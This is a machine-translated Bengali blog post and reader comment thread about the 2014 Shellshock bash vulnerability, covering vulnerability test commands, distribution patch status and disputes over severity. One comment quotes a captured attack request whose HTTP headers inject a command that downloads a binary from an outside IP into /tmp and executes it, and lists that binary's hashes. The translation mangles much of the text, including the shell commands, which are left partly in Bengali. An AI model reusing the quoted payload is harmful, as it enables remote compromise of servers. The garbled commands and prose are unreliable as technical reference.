এটি কিছু ব্লগে দাবানলের মতো দৌড়ায়, দ্য রিপোর্টে প্রকাশিত একটি আইটেম সুরক্ষা ব্লগ de লাল টুপি গ্লোবাল ভেরিয়েবলগুলির অপব্যবহারের কারণে বাশে পাওয়া একটি দুর্বলতা সম্পর্কে। আসল খবর অনুসারে:
“… বাশ শেলটি কল করার আগে আপনি বিশেষভাবে তৈরি করা মান সহ পরিবেশের ভেরিয়েবল তৈরি করতে পারবেন তার কারণেই এই দুর্বলতা। এই ভেরিয়েবলগুলিতে শেলটি চালিত হওয়ার সাথে সাথে কার্যকর করা কোড থাকতে পারে। এই বিশদযুক্ত ভেরিয়েবলের নামটি কেবল তাদের বিষয়বস্তুগুলির জন্য গুরুত্বপূর্ণ নয়। ফলস্বরূপ, এই দুর্বলতা অনেক প্রসঙ্গে প্রকাশিত হয়উদাহরণস্বরূপ,
- ফোর্সকমন্ড এটি sshd কনফিগারেশনে রিমোট ব্যবহারকারীদের জন্য সীমিত কমান্ড এক্সিকিউশন ক্ষমতা সরবরাহ করতে ব্যবহৃত হয়। এই ত্রুটিটি এড়াতে এবং স্বেচ্ছাসেবক আদেশ কার্যকর করার জন্য ব্যবহার করা যেতে পারে। কিছু গিট এবং সাবভার্সন বাস্তবায়ন এ জাতীয় বিধিনিষেধকৃত শেল ব্যবহার করে। ওপেনএসএসএইচের নিয়মিত ব্যবহার প্রভাবিত হয় না কারণ ব্যবহারকারীরা ইতিমধ্যে কনসোলে অ্যাক্সেস পেয়েছেন.
- মোড_সিগি বা মোড_সিজিড ব্যবহার করে অ্যাপাচি সার্ভার প্রভাবিত হয় যদি সিজিআই স্ক্রিপ্টগুলি ব্যাশ, বা স্পোন সুবলভেলে উভয়ভাবে লেখা থাকে। পিএইচপি-তে কোনও সিস্টেম / এক্সিকিউট শেল ব্যবহার করা হলে এই ধরনের সাবলেভিলগুলি সিটিতে সিস্টেম / পপেন দ্বারা, পাইথনের ওএস.সিস্টেম / ওএস.পোপেন দ্বারা স্পষ্টভাবে ব্যবহৃত হয় (সিজিআই মোডে চলার সময়), এবং পার্লে খোলা / সিস্টেম (যা কমান্ড স্ট্রিংয়ের উপর নির্ভর করে)।
- মোড_এইচপিপি দিয়ে সম্পাদিত পিএইচপি স্ক্রিপ্টগুলি সাবলিলগুলি খেললেও প্রভাবিত হয় না।
- ডিএইচসিপি ক্লায়েন্টরা সম্ভাব্য দূষিত সার্ভার থেকে নেওয়া মান সহ সিস্টেমটি কনফিগার করতে শেল স্ক্রিপ্টগুলি আহ্বান করে। এটি ডিএইচসিপি ক্লায়েন্ট মেশিনে সাধারণত মূল হিসাবে নির্বিচারে আদেশগুলি কার্যকর করতে দেয় allow
- SID সুবিধাসমূহ সহ বিভিন্ন ডেমন এবং প্রোগ্রামগুলি পরিবেশগত পরিবর্তনশীল মানগুলি ব্যবহারকারী দ্বারা প্রভাবিত / প্রভাবিত শেল স্ক্রিপ্টগুলি সম্পাদন করতে পারে, যা নির্বিচারে আদেশগুলি কার্যকর করতে দেয় to
- অন্য কোনও অ্যাপ্লিকেশন যা শেলটিতে হুক করে বা শেল স্ক্রিপ্টটি দোভাষী হিসাবে ব্যাশ ব্যবহার করার মতো চালায়। ভেরিয়েবলগুলি রফতানি করে না এমন শেল স্ক্রিপ্টগুলি অবিশ্বস্ত সামগ্রী প্রক্রিয়াকরণ করে এবং এটিকে সংরক্ষণ করে এমনকি এই সমস্যার পক্ষে ঝুঁকিপূর্ণ নয় শেল ভেরিয়েবল (বাম) এবং sublevels খুলুন।
... "
কিভাবে আমার বাশ প্রভাবিত হবে তা জানবেন?
এটি দেওয়া, এটি জানার একটি খুব সহজ উপায় আছে যে আমরা এই দুর্বলতার দ্বারা আক্রান্ত কিনা। প্রকৃতপক্ষে, আমি আমার অ্যান্টারগোস পরীক্ষা করেছি এবং স্পষ্টতই আমার কোনও সমস্যা নেই। আমাদের যা করতে হবে তা হল একটি টার্মিনাল খোলা এবং এটি করা:
env x = '() {:;}; প্রতিধ্বনিত 'বাশ-সি "প্রতিধ্বনি এটি একটি পরীক্ষা"
যদি এটি এভাবে প্রকাশিত হয় তবে আমাদের কোনও সমস্যা নেই:
env x = '() {:;}; প্রতিধ্বনিত 'বাশ-সি "প্রতিধ্বনি এটি একটি পরীক্ষা" বাশ: সতর্কতা: এক্স: ফাংশন সংজ্ঞা প্রচেষ্টা বাশকে উপেক্ষা করে: `x' এর জন্য ফাংশন সংজ্ঞা আমদানি করার সময় এটি একটি পরীক্ষা
যদি ফলাফলটি পৃথক হয় তবে আপনার পছন্দসই বিতরণগুলির আপডেট চ্যানেলগুলি ইতিমধ্যে প্যাচটি প্রয়োগ করেছে কিনা তা দেখতে আপনার উচিত। সুতরাং আপনি জানেন 😉
আপডেট হয়েছে: এটি উবুন্টু 14:04 ব্যবহার করে সহকর্মীর আউটপুট:
env x = '() {:;}; প্রতিধ্বনি 'বশ-সি "প্রতিধ্বনি এটি একটি পরীক্ষা" দুর্বল এটি একটি পরীক্ষা
আপনি দেখতে পাচ্ছেন, এখন পর্যন্ত এটি দুর্বল।
আমি 14.04 থেকে কুবুন্টু 64 পেয়েছি এবং আমিও পেয়েছি:
env x = '() {:;}; প্রতিধ্বনিত 'বাশ-সি "প্রতিধ্বনি এটি একটি পরীক্ষা"
জেয়
এটা একটা পরীক্ষা
আমি ইতিমধ্যে আপডেট করেছি, তবে এটি সঠিক হয় না। কি করো?
তাদের আপডেট হওয়ার জন্য অপেক্ষা করুন। ইতিমধ্যে উদাহরণস্বরূপ eOS আপডেট হয়েছে .. 😀
কত অদ্ভুত, আমারও আছে কুবুন্টু 14.04
$ env x = '() {:;}; প্রতিধ্বনিত 'বাশ-সি "প্রতিধ্বনি এটি একটি পরীক্ষা"
বাশ: সতর্কতা: এক্স: ফাংশন সংজ্ঞা প্রচেষ্টা উপেক্ষা
বাশ: `x 'এর জন্য ফাংশন সংজ্ঞা আমদানিতে ত্রুটি
এটা একটা পরীক্ষা
আমি যুক্ত করছি যে আজ ডাউনলোড করা "ব্যাশ" প্যাকেজের সংস্করণটি হ'ল:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
আমার ক্ষেত্রে, কমান্ডটি দেওয়ার সাথে সাথে এটি আমাকে টার্মিনালে নিম্নলিখিতটি দেয়:
>যাইহোক, রসিকতাটি হ'ল আমি ডেবিয়ান হুইজি আপডেট করেছি এবং এটিই আমাকে ফেলে দিয়েছে।
হুই এখনও বাগের দ্বিতীয় অংশের জন্য ঝুঁকিপূর্ণ, কমপক্ষে বিকেলে (ইউটিসি -4: 30) সমস্যাটি এখনও অনুসরণ করছিল: /
আমি কেবল যাচাই করেছি যে আজ সকালে একটি আপডেট প্রয়োগের পরে স্ল্যাকওয়্যার বা দেবিয়ান বা সেন্টোস উভয়ই একটি সম্পর্কিত আপডেট পাওয়ার কারণে প্রভাবিত হয় না।
এই মুহুর্তে উবুন্টুকে এখনও কী ঝুঁকিপূর্ণ করে তোলে? এবং বলুন এটি নিরাপদ: ডি।
তবে আপনি কি উবুন্টুকে আপডেট করার চেষ্টা করেছেন?
আজকের আপডেটের সাথে তারা এটিও ঠিক করে দিয়েছে।
OK
সুরক্ষা বিশেষজ্ঞরা 'বাশ'-এর দুর্বলতার বিষয়ে সতর্ক করেছেন, এটি লিনাক্স সফটওয়্যার ব্যবহারকারীদের জন্য হার্টবেল্ড ত্রুটির চেয়ে আরও বড় হুমকির কারণ হতে পারে, যেখানে' হ্যাকাররা 'সিস্টেমের সম্পূর্ণ নিয়ন্ত্রণ নিতে বাশের একটি বাগটি ব্যবহার করতে পারে।
সাইবারসিকিউরিটি ফার্ম র্যাপিড at-এর ইঞ্জিনিয়ারিং ম্যানেজার টড বিয়ার্ডস্লি সতর্ক করেছিলেন যে ত্রুটিটি তার তীব্রতার জন্য 7 রেট দেওয়া হয়েছিল যার অর্থ এটি সর্বোচ্চ প্রভাব ফেলেছে এবং শোষণের জটিলতার জন্য "নিম্ন" রেট দিয়েছে যা 'হ্যাকার' আক্রমণগুলির জন্য তুলনামূলকভাবে সহজ। এই দুর্বলতাটি ব্যবহার করে, আক্রমণকারীরা সম্ভাব্যভাবে অপারেটিং সিস্টেমের নিয়ন্ত্রণ নিতে পারে, গোপনীয় তথ্য অ্যাক্সেস করতে পারে, পরিবর্তন করতে পারে ইত্যাদি, " তিনি আরও যোগ করেছেন, "বাশ দখল করে নেওয়া সিস্টেমগুলির সাথে যে কেউ প্যাচটি তত্ক্ষণাত প্রয়োগ করতে হবে।"
পুরানো টোল (জিএনইউ) উপস্থাপন করে এমন বৈকল্পিকতার আগে যেখানে বাখ হোস্ট করা হয়েছে, লিনাক্স সফটওয়্যারটির জন্য জিএনইউ থেকে মুক্তি পাওয়া এবং বিএসডি সরঞ্জামটির পরিবর্তন করা আরও সুবিধাজনক হবে।
PS: আমার মত প্রকাশের স্বাধীনতা সেন্সর করবেন না, ... কাউকে অপমান করবেন না, ... আমি যে বার্তাটি মুছে ফেলেছি তার আগের বার্তাটি মুছে ফেলবেন না!
ওহ দয়া করে, এটি অতিরিক্ত না। আমি যারা বিএসডি ব্যবহার করি এবং জিএনইউ, লিনাক্স বা এই প্রকল্পগুলি থেকে আসা যে কোনও কিছুকে ঘৃণা করি How
আমি আপনার সাথে আছি এবং আপনি এই গর্তের তীব্রতা সম্পর্কে একেবারে ঠিক।
এটি সেন্সরশিপ ছিল না, এটি অতিরিক্ত কাজ ছিল (আপনি জিনোম ৩.১৪ পোস্টে একই মন্তব্য করেছিলেন)
«… এবং শোষণের জটিলতার কারণে 'কম' রেট দেওয়া হয়েছে যার অর্থ হ্যাকারের আক্রমণগুলির জন্য এটি তুলনামূলকভাবে সহজ»
অসঙ্গতটি কি লক্ষণীয়?
দুর্বলতা কাজে লাগানো কীভাবে সহজ হতে পারে এবং একই সাথে এটি "জটিল" স্তরের ঝুঁকিও রয়েছে কারণ এটি ব্যবহার করা এত জটিল?
এটি একটি বাগ যা বৈঠকের কয়েক ঘণ্টার মধ্যে সমাধান করা হয়েছিল এবং হৃদয়গ্রাহীদের মতো শোষণের কোনও খবর পাওয়া যায়নি (অবশ্যই, একে অপরকে জানার জন্য এই সময় কম)।
এটি বাস্তব ঝুঁকির চেয়ে বেশি ট্যাবলয়েড প্রেস।
@ স্টাফ কি আপনার কাছে গুরুত্বহীন বলে মনে হচ্ছে? এখন আমাকে কী বলবে?
GET./.HTTP/1.0
.উজার-এজেন্ট:। ধন্যবাদ- রব
.কুকি: ()।:।:।};। Wget.-O./tmp/besh।http://162.253.66.76/nginx; .chmod.777। / tmp / besh; ./ tmp / besh;
.হোস্ট: ()। {।:;।}; Wget.-O./tmp/besh।http://162.253.66.76/nginx; .chmod.777। / tmp / besh; ./ tmp / besh;
.রিফারার: ()। {:;।};। Wget.-O./tmp/besh।http://162.253.66.76/nginx; .chmod.777। / tmp / besh; ./ tmp / besh;
। গ্রহণ করুন:। * / *
$ ফাইল nginx
এনজিএনএক্স: জিএনইউ / লিনাক্স ২.32.১৮ এর জন্য স্ট্যাটিকালি লিঙ্কযুক্ত ELF 80386-বিট এলএসবি এক্সিকিউটেবল, ইন্টেল 1, সংস্করণ 2.6.18 (এসওয়াইএসভি) কেটে ফেলা হয়েছে
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
আপনি কি জানেন এটা কি? সামান্য বিপজ্জনক কিছুই ...
পরিস্থিতিটি বেশ গুরুতর, তবে সেখান থেকে বলতে গেলে আপনার একটি BSD বিকল্পের জন্য ব্যাশ ব্যবহার বন্ধ করা উচিত, এটি ইতিমধ্যে ততটাই, যাইহোক আপডেটটি ইতিমধ্যে রয়েছে, আমি কেবল আপডেটটি স্পর্শ করি এবং অন্য কিছুই না।
এখন পিডি, আমি মনে করি এটি আরও সহকর্মী @ রোবট, আমি মনে করি না যে এখানে প্রশাসকরা এ জাতীয় মন্তব্য মুছে ফেলতে উত্সর্গীকৃত কারণ হ্যাঁ, কারণ যেহেতু আমি এই সম্প্রদায়টিতে অংশ নিয়েছি আমার সেই অনুভূতি হয়েছে এবং আমি আশা করি এটি এখনও বহাল রয়েছে উপায়
গ্রিটিংস।
আপনি ঠিক একই মন্তব্য দুটি ভিন্ন পোস্টে রেখেছেন। আপনি যদি গল্পটির "উত্স" প্রচার করার চেষ্টা করছেন তবে দুঃখিত, এটি স্থান নয়।
বাশ ইউনিক্স (এবং এর জিএনইউ ক্লোন) থেকে আসে। ওএসএক্সের মতো বিএসডি ভিত্তিক সিস্টেমগুলিও ক্ষতিগ্রস্থ হয়েছে এবং জেনবেতার মতে তারা এখনও এটি প্যাচ করেনি। তেমনি, বাশ অ্যাক্সেস করার জন্য আপনার স্থানীয় বা এসএসএইচ এর মাধ্যমে একটি ব্যবহারকারী অ্যাকাউন্ট প্রয়োজন need
@কর্মী:
1.- বাগের দ্বারা প্রভাবিত হতে পারে এমন পরিসেবার পরিমাণের কারণে এটি স্তর 10 (বিপদের সর্বোচ্চ স্তর) হিসাবে শ্রেণিবদ্ধ করা হয়েছে। মূল নোটটিতে তারা এই বিষয়টিকে খুব স্পষ্ট করে তুলে ধরে, এই তর্ক করে যে বাগটি অ্যাপাচি, এসএসডিডি, সুইড পারমিশন সহ প্রোগ্রামগুলি (xorg, অন্যদের মধ্যে) প্রভাবিত করতে পারে।
২- এটি কার্যকরকরণের ক্ষেত্রে নিম্ন স্তরের হিসাবে শ্রেণীবদ্ধ করা হয়েছে, এবং এর সর্বোত্তম উদাহরণটি @ ইলাভ পোস্টে রেখেছেন এমন দুর্বলতা পরীক্ষা স্ক্রিপ্ট। বাস্তবায়ন করা খুব কঠিন নয়, আপনি দেখতে পাচ্ছেন।
আমি তথ্যগুলিতে অপ্রয়োজনীয়তা দেখি না (আমি কেবল একটি গুগল অনুবাদই দেখি) এবং যদি সমস্যাটি বেশ গুরুতর হয় এবং আপনি যেমনটি বলেন, এর মধ্যে ইতিমধ্যে একটি প্যাচ এবং সমাধান রয়েছে, তবে এর জন্য নয়, এটি আর ঝুঁকি নয়, এবং বেশ বাস্তব।
@ পেটারচেখো / @ ইউকিটারু
আমার ভুল ব্যাখ্যা করবেন না, আমি মনে করি এটি স্পষ্ট যে আমার সমালোচনা হ'ল এমন সংবাদ যা রোবেট লিঙ্ক করেছে এবং অসচ্ছলতার দিকে মনোনিবেশ করেছে, অপ্রয়োজনীয় নয়।
একইভাবে, আমাদের অবশ্যই ঝুঁকি এবং বিপদের মধ্যে পার্থক্য করতে হবে (আমি পরবর্তীটির উল্লেখ করি না), আমরা সাধারণত এগুলি প্রতিশব্দ হিসাবে ব্যবহার করি, তবে এখানে বিপদটি বাগের ক্ষয়ক্ষতি এবং তার সংঘটিত হওয়ার সম্ভাবনা ঝুঁকিপূর্ণ হতে পারে।
আমার বিশেষ ক্ষেত্রে, আমি গতকাল থেকে প্রবেশ করেছি। এটি মেলিং তালিকাগুলি বা এর মতো কোনও কিছুর জন্য নয়। এটি একটি ডেস্কটপ ডিস্ট্রোয়ের জন্য ছিল! আমি ফোনটি তুলেছি এবং লিঙ্কটি দিয়ে সিসাদমিনকে একটি বার্তা পাঠিয়েছিলাম এবং আমি নিশ্চিত করেছিলাম যে আমার কাছে সমস্ত কিছু প্যাচ হয়েছে, তবে আমাকে ক্ষমা করবেন তবে এই সংবাদগুলি আমাকে জাগ্রত রাখবে না।
অন্যান্য ফোরামে তারা বাশ দুর্বলতার কথা উল্লেখ করে, "যে সমাধানটি দেবিয়ান এবং উবুন্টু প্রকাশ করেছিল", কিন্তু আজ তারা আবিষ্কার করেছে যে একটি দুর্বলতা এখনও রয়েছে, তাই সমাধানটি অসম্পূর্ণ ছিল, তারা এটাই উল্লেখ করেছেন!
আমি দেখতে পেয়েছি যে লোকেরা দুর্বলতার তীব্রতা থেকে রোধ করার সর্বাধিক সত্যের জন্য আমাকে সমালোচনা করেছে - সর্বোচ্চ বিপদসংস্থার একটি স্তরকে দশমিকভাবে যোগ্য করে তুলেছে এবং লিনাক্স সফ্টওয়্যারটির পুরানো জিএনইউ সরঞ্জামের যেখানে সম্ভবত বাশ হোস্ট করা হয়েছে তার মুখোমুখি সমাধানগুলির উল্লেখ করেছে - যা নিখুঁতভাবে জিএনইউকে লিনাক্স সফটওয়্যারটিতে বিএসডি সরঞ্জাম দিয়ে প্রতিস্থাপন করা যেতে পারে,… আমি লিনাক্সও ব্যবহার করি এবং আমি লিনাক্সও পছন্দ করি!
আমি স্পষ্ট করে দিয়েছি যে ব্যাশ ডিএসডি তে BSD তে ইনস্টল করা হয় না, এটি আরও একটি লিনাক্স সামঞ্জস্যতা প্যাকেজ যা BSD এ ইনস্টল করা যেতে পারে ... হ্যাঁ! এবং উত্সটি এমনভাবে রাখা হয়েছে যাতে তারা সংবাদটি পরীক্ষা করতে পারে, যেহেতু অনেক ব্যবহারকারী কখনও কখনও বার্তা বা মন্তব্যকে বিশ্বাস করেন না।
রোবট: তারা ইতিমধ্যে আপনাকে বারবার বলেছে, আপনি ইতিমধ্যে একটি পোস্টে এই খবরের সাথে আপনার মন্তব্যটি রেখেছেন, আপনার মন্তব্য করা প্রতিটি পোস্টে আপনাকে এটি লিখতে হবে না।
বাশ সম্পর্কে, অন্যান্য শেল রয়েছে যেগুলি ব্যাশ দুর্বলতার ক্ষেত্রে ব্যবহার করা যেতে পারে। 😉
রোবেট, আমি জানি যে এমন কোনও সফ্টওয়্যার নেই যা লিনাক্স কার্নেলটি বিএসডি ব্যবহারকারীর সাথে একত্রিত করে। নিকটতম জিনিসটি হ'ল জেন্টু এবং ডেবিয়ানের মতো কেবিএসডি + জিএনইউর কাছাকাছি অন্য উপায়। এছাড়াও, জিএনইউ (1983) বিএসডি (1977) এর পরে থাকলে তাকে "পুরাতন ধাঁচের" বলা যায় না। তারা উভয়ই তাদের ইউনিক্স মূলটি ভাগ করে দেয় (তবে কোডটি নয়), লিনাস টি যখন শিশু ছিল তখন বাশ তৈরি করা থাকলে কোনও "লিনাক্স সামঞ্জস্যতা" থাকবে না would
ইউএফ, এই মুহুর্তে ডেবিয়ান টেস্টিংটি "দুর্বল" যা আমাদের একটি ধারা আছে ...
আমি ডেবিয়ান টেস্টিং ব্যবহার করি এবং এমনকি এই শাখায় আমরা বাশ আপডেট পেয়েছি
জেনবেটা অনুসারে অন্য দুর্বলতাও রয়েছে
http://seclists.org/oss-sec/2014/q3/685
জিজ্ঞাসা কমান্ড হয়
env X = '() {(a) => sh' sh -c "প্রতিধ্বনি দুর্বল"; bash -c "প্রতিধ্বনি ব্যর্থতা 2 আনপ্যাচড"
env X = '() {(a) => sh' sh -c "প্রতিধ্বনি দুর্বল"; bash -c "প্রতিধ্বনিত ব্যর্থতা 2" sh: এক্স: লাইন 1: অপ্রত্যাশিত উপাদানগুলির নিকটে সিনট্যাক্টিক ত্রুটি `= 'শ: এক্স: লাইন 1:`' শ: `এক্স 'শ: এর জন্য ফাংশন সংজ্ঞা আমদানিতে ত্রুটি: দুর্বল: কমান্ড পাওয়া যায়নি প্যাচিং ছাড়াই ব্যর্থতা 2একই আমি।
একই অবস্থা. তবে পোস্টটিতে মূল বাগটি (এল) উবুন্টু 14.04-এ প্যাচ করা হয়েছিল
একটি সাধারণ প্রতিধ্বনি করার পরিবর্তে, এটি এমন একটি নির্দেশনা কার্যকর করার চেষ্টা করুন যাতে সুবিধাগুলি প্রয়োজন, আমি "অপর্যাপ্ত সুযোগ-সুবিধা" ফেলে দিই ... এই বাগটি সুবিধাগুলি বাড়ায় না?
তুমি ঠিক বলছো!! তারা দুটি দুর্বলতা ছিল ...
লিনাক্স মিন্টে আমার কাছে দ্বিতীয় বাশ আপডেটের পরে তারা গত রাতে উবুন্টু সংগ্রহস্থলগুলিতে রেখেছিল, সেই কমান্ডটি কার্যকর করার সময় শেলটি এই আউটপুট সরবরাহ করে:
env X = '() {(a) => sh' sh -c "প্রতিধ্বনি দুর্বল"; bash -c "প্রতিধ্বনিত 2 ব্যর্থ"
>
পূর্ববর্তীগুলি আপডেট করার জন্য উবুন্টু সংগ্রহস্থলে যে "বাসশ" র সংস্করণ রাখা হয়েছিল তা হ'ল:
4.3-7ubuntu1.2
ডেবিয়ান উদ্ভূত সিস্টেমে আপনি এই আদেশটি দিয়ে ইনস্টল করা সংস্করণটি পরীক্ষা করতে পারেন:
dpkg -s bash | গ্রেপ সংস্করণ
যে কোনও ক্ষেত্রে এটি পরিষ্কার করা উচিত, কমপক্ষে ডেবিয়ান, উবুন্টু এবং পুদিনা ব্যবহারকারীদের জন্য; #! / Bin / sh শিরোলেখ দিয়ে স্ক্রিপ্টগুলি চালিত প্রোগ্রামগুলি সম্পর্কে আপনার খুব বেশি চিন্তা করা উচিত নয় কারণ সেই বিতরণগুলিতে / বিন / এস "বাশ" ডাকে না, তবে শেলটিকে "ড্যাশ" দিয়ে আবদ্ধ করে তোলে (ড্যাশ হল :)
ডেবিয়ান অ্যালকেমিস্ট কনসোল (ড্যাশ) একটি উত্পন্ন পসিক্স কনসোল
ছাই
.
যেহেতু এটি স্ক্রিপ্টগুলি বাশের চেয়ে দ্রুত সম্পাদন করে এবং এর কম নির্ভরতা রয়েছে
গ্রন্থাগারগুলি (সফ্টওয়্যার ব্যর্থতার বিরুদ্ধে এটি আরও শক্তিশালী করে তোলে বা or
হার্ডওয়্যার), এটি সিস্টেমে ডিফল্ট সিস্টেম কনসোল হিসাবে ব্যবহৃত হয়
দেবিয়ান
সুতরাং, কমপক্ষে উবুন্টুতে, "বাশ" ব্যবহারকারীর লগইনের জন্য শেল হিসাবে ব্যবহৃত হয় (মূল ব্যবহারকারীর জন্যও)। তবে যে কোনও ব্যবহারকারীর ডিফল্টরূপে ব্যবহারকারী এবং রুট কনসোলগুলি (টার্মিনাল) অন্য শেল ব্যবহার করতে পারে।
শেলটি এই কমান্ডগুলি প্রয়োগ করে স্ক্রিপ্টগুলি (#! / বিন / শ) কার্যকর করে তা পরীক্ষা করা সহজ:
ফাইল / বিন / শি
(আউটপুটটি / বিন / শ: প্রতীকী link ড্যাশের সাথে যোগসূত্র) আমরা আদেশটি পুনরাবৃত্তি করে ট্রেস অনুসরণ করি
ফাইল / বিন / ড্যাশ
(আউটপুটটি হ'ল / বিন / ড্যাশ: ELF 64-বিট এলএসবি শেয়ার্ড অবজেক্ট, x86-64, সংস্করণ 1 (এসওয়াইএসভি) তাই এটি কার্যকর হয় ut
এটি লিনাক্স মিন্ট 17 বিতরণের ফলাফল। অন্যান্য নন-উবুন্টু / ডেবিয়ান-ভিত্তিক বিতরণগুলিতে তারা আলাদা হতে পারে।
ডিফল্ট শেল পরিবর্তন করা খুব কঠিন নয় !! আপনি এমনকি ব্যবহারকারী এবং মূল ব্যবহারকারীর জন্য আলাদা ব্যবহার করতে পারেন। আসলে আপনাকে কেবল নিজের পছন্দের শেলটি ইনস্টল করতে হবে এবং "chsh" কমান্ডের সাহায্যে বা / etc / passwd ফাইল সম্পাদনা করে (যদিও ব্যবহারকারীরা "পাসডাব্লুডি" ফাইল সম্পাদনা করার সময় কোনও ত্রুটির পরিণতি জানে না, এটি ভাল যে তারা নিজেরাই তাদের খুব ভালভাবে অবহিত করে এবং এডিট করার আগে, এটি পুনরুদ্ধার করার প্রয়োজন হলে মূলটির একটি অনুলিপি তৈরি করুন)।
আমি "টিসিএসএস" দিয়ে আরও স্বাচ্ছন্দ্য বোধ করি (টিসিএসটি হল :)
টেনেক্স সি কনসোল, বার্কলে সিএসএসের একটি উন্নত সংস্করণ
"সিএসএইচ" হ'ল ম্যাক ওএস এক্স কয়েক বছর আগে used অ্যাপলের বেশিরভাগ অপারেটিং সিস্টেম হ'ল ফ্রিবিএসডি কোড considering গতকাল আমি যা পড়েছি তা থেকে মনে হচ্ছে তারা ব্যবহারকারীর টার্মিনালগুলির জন্য "বাশ" সরবরাহ করে।
উপসংহার:
- সর্বাধিক ব্যবহৃত বিতরণের জন্য "বাশ" সংস্করণ "ইতিমধ্যে বিতরণ করা হয়েছে
- "বাশ" এর সংস্করণ 4.3-7ubuntu1.2 এবং পরবর্তীগুলিতে এই বাগগুলি ধারণ করে না
- ওএস * লিনাক্সে "বাশ" ব্যবহার বাধ্যতামূলক নয়
- কয়েক * লিনাক্স বিতরণ লিঙ্ক #! / বিন / এস "বাশ" এর সাথে
- বিকল্প রয়েছে: ছাই, ড্যাশ, সিএসএস, টিসিএস এবং আরও কিছু
- টার্মিনাল খোলার সময় সিস্টেমটি যে ডিফল্ট শেলটি কল করে এটি পরিবর্তন করা কঠিন নয়
- কয়েকটি ছোট ডিভাইস (রাউটার এবং অন্যান্য) "ব্যাশ" ব্যবহার করে, কারণ এটি খুব বড় !!
এখনই অন্য একটি আপডেট এসেছে যা "বাশ" এর অন্য সংস্করণ ইনস্টল করে 4.3-7ubuntu1.3
লিনাক্স মিন্ট 17 এবং উবুন্টু 14.04.1 এলটিএসের জন্য
আর্কলিনাক্স bash-4.3.026-1 সংস্করণে প্রবেশ করেছে
@ জুরক্সো…। বার্কলে থেকে ক্যাস??… আমি উপরে যে কথা বলি সে সম্পর্কে আপনি কিছু বুঝতে পেরেছেন এবং বাশ হোস্ট করা পুরাতন জিএনইউ সরঞ্জামের চেয়ে BSD “csh” ব্যবহার করা ভাল। লিনাক্স সফটওয়্যারটির জন্য সেই সরঞ্জামটি সেরা।
আমার ধারণা এটি বাগ is
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
সত্য?
এবং এর সমাধান কী হবে?
আপনার ডিস্ট্রো the এ প্যাকেজ আপডেট করার জন্য তাদের অপেক্ষা করুন 😉
বাগটি শেলশক হিসাবে বাপ্তিস্ম নিয়েছিল
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
জেয়
এটা একটা পরীক্ষা
উবুন্টু স্টুডিও 14.04 এর জন্য এখনও কোনও প্যাচ নেই
উবুন্টু স্টুডিওতে মেরামত 14.04.1
উইসপি @ উবুনস্টুডুডিও: ~ $ এনভ এক্স = '() {:;}; প্রতিধ্বনিত 'বাশ-সি "প্রতিধ্বনি এটি একটি পরীক্ষা"
বাশ: সতর্কতা: এক্স: ফাংশন সংজ্ঞা প্রচেষ্টা উপেক্ষা
বাশ: `x 'এর জন্য ফাংশন সংজ্ঞা আমদানিতে ত্রুটি
এটা একটা পরীক্ষা
আসলে এটি একটি সামান্য দুর্বলতা, যদি এটি আপনাকে প্রভাবিত করে তবে এটি হ'ল আপনি আগে কিছু ভুল করেছিলেন ...
কারণ মূল সুযোগগুলির সাথে চালিত বাশ স্ক্রিপ্টটি কখনই ব্যবহারকারীর সামনে প্রকাশ করা উচিত নয়। এবং যদি তিনি কোনও সুযোগ-সুবিধা ছাড়াই দৌড়ান, তবে এরকম কোনও বৌদ্ধিকতা নেই। আসলে, এটি বাজে। অনেক ভয়ঙ্কর।
আমিও তাই মনে করি.
ঠিক যেমন, আরও বেশি পত্রিকা বিক্রি করতে বা আরও বেশি দর্শন পেতে, এই বাগগুলি ভাল।
তবে তারা সর্বদা এটি উল্লেখ করতে ভুলে যায় যে এই ধরণের স্ক্রিপ্টগুলির সাথে কোনও কম্পিউটারের সাথে আপস করার জন্য আপনাকে প্রথমে ব্যাশ অ্যাক্সেস করতে হবে এবং তারপরে এটি রুট হিসাবে থাকা উচিত।
কর্মীরা যদি আপনি সিগির সাথে অ্যাপাচি ব্যবহার করেন তবে HTTP শিরোনামগুলিতে কুকিজ হিসাবে রেখে দিন বা আপনি যে ফাংশনটি সম্পাদন করতে চান তা রেফার করে। এমনকি এটি কীট ছড়িয়ে দেওয়ার জন্য ব্যবহৃত হয়েছে।
এবং যদি কেউ একটি সার্ভারে উইজেট mishell.php দিয়ে একটি শেল রাখে, সেক্ষেত্রে এটি গুরুতর নয়, তাই না?
তোমার সাথে একমত. আমি ভেবেছিলাম এটি হার্টবেল্ডের মতো একটি বিশাল বাগ (এমনকি এনএসএ নিজেই কৌতূহল বাড়ানোর জন্য ধার দিয়েছিল) তবে সর্বোপরি এটি একটি ছোট্ট বাগ ছিল।
অন্যান্য সত্যিই মারাত্মক ত্রুটি রয়েছে যেমন ফ্ল্যাশের উন্মাদ খরচ এবং মরিচ ফ্ল্যাশ প্লেয়ারের পারফরম্যান্স ড্রপ এবং ইতিমধ্যে ঠিক করা হয়েছে এমন একটি ক্রোম এবং ফায়ারফক্সে ওয়েবআরটিসি বাগ.
আপনি কি জানেন যে লিনাক্স মিন্ট 16 রয়েছে এমন লোকদের জন্য এটির কোনও ব্যবস্থা আছে কিনা?
দেবিয়ান পরীক্ষায় এটি ইতিমধ্যে ঠিক করা হয়েছিল।
আমার 5 ডিস্ট্রোজে এটির সমাধান হয়েছে, আমার ওএস এক্সে আমি জানি না।
দয়া করে আমার মন্তব্য সেন্সর করবেন না, আমি ওএস এক্স বলেছিলাম you আপনি এই সাইটে ওএস এক্স বলতে পারেন কিনা তা আমি জানি না।
@ ইয়য়ো ভাল করে খুব বেশি প্রকাশ করবেন না যে তারা এখনও প্যাচের কিছু বিবরণ নিয়ে কাজ করছে ... এটি চেষ্টা করে দেখুন এবং তারপর আমাকে বলুন কীভাবে এক্সডি
env x = '() {:;}; প্রতিধ্বনিত 'বাশ-সি "প্রতিধ্বনি আমি আইফোন 6 এর ট্র্যাশের চেয়ে বেশি দুর্বল
ওএস এক্স এর আগে যদি তারা এটি 100% সমাধান করে থাকে তবে আমি কোনও কিছু বাজি ধরতে পারি
ঠিক আছে, এমনকি আরস টেকনিকায় তারা ওএসএক্সে বাশকে প্রাসঙ্গিকতা দেয়।
